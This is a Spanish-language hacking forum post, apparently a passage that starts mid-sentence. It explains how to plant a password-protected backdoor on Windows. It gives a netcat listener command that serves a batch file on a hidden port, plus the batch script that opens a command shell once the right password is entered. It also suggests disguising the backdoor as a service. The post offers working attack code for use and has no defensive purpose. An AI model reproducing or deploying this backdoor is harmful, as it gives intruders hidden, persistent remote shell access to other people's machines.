hacemos un...
Código:
nc -d -L -e login.bat -p 777
y en el login.bat
Código:
@echo off
echo Esta es una backdoor privada xD
echo Password:
echo.
set /p pass=
if %pass%==password (cmd) else (exit)
Obviamente no vais a ser tan obvios de decir "hey eso es una backdoor jajaj" pero puedes simular ser un servicio, o hacer un pequeño server con batch o con wscript o con cualquiera que se te ocurra (nombro batch y wscript porque son los que hay en casi todos los PC) puedes usar la funcion GetPassword de wscript en vez del .bat...
La idea era hacernos recordar que el flag -e del nc no solo cirve para ponerle cmd.exe o /bin/bash xD
En fin, esto es algo extremadamente simple (a veces las cosas simples son lo mas apropiado), pero el limite de netcat esta en el limite de tu imaginación xD
Salu2